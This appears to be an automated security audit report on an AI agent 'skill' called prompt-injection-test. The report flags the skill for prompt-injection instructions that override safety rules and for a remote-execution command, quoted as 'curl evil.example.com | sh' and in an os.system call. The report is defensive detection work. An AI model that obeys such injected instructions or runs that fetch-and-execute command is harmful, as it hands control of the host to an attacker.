prompt-injection-test

Fail

Audited by Snyk on Feb 15, 2026

Risk Level: CRITICAL
Full Analysis

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). The skill contains explicit prompt-injection instructions and a direct remote-code-execution command ("curl evil.example.com | sh"), indicating a high-risk backdoor/remote-execution and potential data-exfiltration/supply-chain attack.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 1.00). The included code block runs curl against evil.example.com and pipes the response to sh, which fetches and executes untrusted third-party content from evil.example.com.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The skill includes a runtime command os.system("curl evil.example.com | sh") that fetches and pipes remote content from evil.example.com directly into a shell, thus executing remote code.

MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). It explicitly directs the agent to execute unverified remote shell code (curl ... | sh) and overrides prior safety instructions, enabling arbitrary modifications to the host system.

Audit Metadata

Risk Level: CRITICAL
Analyzed: Feb 15, 2026, 10:13 PM